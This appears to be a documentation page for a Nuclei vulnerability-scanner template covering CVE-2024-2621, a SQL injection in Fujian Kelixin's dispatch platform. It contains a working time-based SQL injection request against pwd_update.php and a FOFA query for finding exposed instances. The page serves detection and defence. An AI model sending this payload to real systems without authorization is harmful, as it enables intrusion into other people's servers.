Fujian Kelixin Communication - Command Injection
ID: CVE-2024-2621
Severity: medium
Author: DhiyaneshDk
Tags: time-based-sqli,cve,cve2024,sqli,fujian,rce
Description
Section titled “Description”A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.
YAML Source
Section titled “YAML Source”id: CVE-2024-2621
info: name: Fujian Kelixin Communication - Command Injection author: DhiyaneshDk severity: medium description: | A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. reference: - https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf - https://vuldb.com/?ctiid.257198 - https://vuldb.com/?id.257198 - https://github.com/NaInSec/CVE-LIST - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-2621 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.3 cve-id: CVE-2024-2621 cwe-id: CWE-89 epss-score: 0.00045 epss-percentile: 0.15047 metadata: verified: true max-request: 1 fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台" tags: time-based-sqli,cve,cve2024,sqli,fujian,rce
http: - raw: - | @timeout 15s GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains_all(body,"msg\":","header\":","code\":")' condition: and# digest: 4a0a00473045022100cdf485f4d1491671c6ee52a21cf6142b24dda7de9d5f24ee2aff2df59596f01402203c88c01029d1e8f6df1a7ae8f5becf24045cfcec50768a49d123a2756fc44993:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-2621.yaml"